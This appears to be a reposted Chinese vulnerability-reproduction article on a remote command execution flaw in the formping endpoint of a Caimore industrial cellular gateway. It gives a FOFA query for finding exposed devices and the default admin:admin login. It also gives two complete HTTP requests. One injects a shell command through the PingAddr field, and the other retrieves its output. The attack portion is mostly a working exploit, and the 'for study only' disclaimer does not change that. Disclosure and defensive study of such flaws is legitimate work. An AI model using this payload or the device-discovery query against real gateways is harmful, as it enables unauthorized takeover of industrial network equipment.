前言
厦门才茂通信网关formping存在远程命令执行漏洞,攻击者可通过特定payload对目标服务器发起攻击,造成不可估量的影响。
声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、漏洞描述
厦门才茂网关,采用开放式软件架构设计,是一款金属外壳设计,带4路千兆LAN、1路千兆WAN,采用 3G/4G/5G 广域网络上网通信的工业级设计无线网关,支持2.4GWiFi和5.8GWiFi
厦门才茂网关系统formping存在命令执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。
二、漏洞复现
FOFA:app=" CAIMORE-Gateway"
弱口令 admin:admin 登录,通过漏洞执行linux命令,在通过访问指定参数得到回显
Payload如下:文章来源:https://www.toymoban.com/news/detail-612020.html
POC1:
POST /goform/formping HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 63
Authorization: Basic YWRtaW46YWRtaW4=
Accept-Encoding: gzip
PingAddr=127.0.0.1%7Cecho%20hellocaimao&PingPackNumb=1&PingMsg=
POC2:
GET /pingmessages HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Authorization: Basic YWRtaW46YWRtaW4=
Accept-Encoding: gzip
访问应用会出现弹窗认证(401)机制,输入 admin:admin 登录
POC验证如下:
文章来源地址https://www.toymoban.com/news/detail-612020.html
到了这里,关于【漏洞复现】厦门才茂通信网关formping远程命令执行漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
